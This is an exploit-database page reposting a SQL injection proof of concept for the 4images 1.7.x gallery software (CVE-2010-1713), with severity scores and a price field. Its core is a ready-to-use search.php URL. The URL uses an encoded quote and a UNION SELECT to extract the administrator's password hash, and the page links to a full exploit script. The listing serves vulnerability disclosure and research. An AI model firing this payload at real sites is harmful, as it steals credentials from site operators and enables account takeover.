Advertisement






SQL injection - 4images 1.7.x

CVE Category Price Severity
CVE-2010-1713 CWE-89 $350 High
Author Risk Exploitation Type Date
Unkown High Remote 2006-10-13
CPE
cpe:cpe:/a:4home:4images:1.7.10
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.9 0.98

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006100072

Below is a copy:

/****************************************/
http://www.w4cking.com

Product:
4images 1.7.x
http://www.4homepages.de

Vulnerability:
SQL injection

Notes:
- SQL injection can be used to obtain password hash
- for version 1.7.3, you must log in as a registered user

POC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20
user_password%20from%204images_users%20where%20user_name=%2527ADMIN

Original advisory with exploit script (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1037

/****************************************/

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum